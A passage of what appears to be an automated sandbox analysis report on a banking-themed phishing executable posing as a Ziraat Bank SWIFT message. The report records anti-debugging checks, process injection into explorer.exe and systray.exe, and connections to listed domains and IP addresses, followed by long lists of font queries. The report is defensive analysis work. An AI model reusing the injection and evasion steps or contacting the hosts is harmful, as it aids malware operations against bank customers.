Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0128D5E0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0133FDE2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_012B9910
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.notarpucarhr.com
Source: C:\Windows\explorer.exe Domain query: www.oaksinstitute.net
Source: C:\Windows\explorer.exe Network Connect: 103.11.189.189 80
Source: C:\Windows\explorer.exe Domain query: www.multimediapages.com
Source: C:\Windows\explorer.exe Network Connect: 141.136.43.229 80
Source: C:\Windows\explorer.exe Network Connect: 38.239.92.131 80
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 1010000
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Memory written: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Thread register set: target process: 3528
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3528
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: explorer.exe, 00000007.00000000.374080606.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.394264558.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.331690721.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000007.00000000.399124469.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.374080606.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.350620618.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.374080606.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.394264558.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.331690721.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.330992667.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.393881656.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.373733761.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 00000007.00000000.374080606.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.394264558.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.331690721.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe VolumeInformation
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
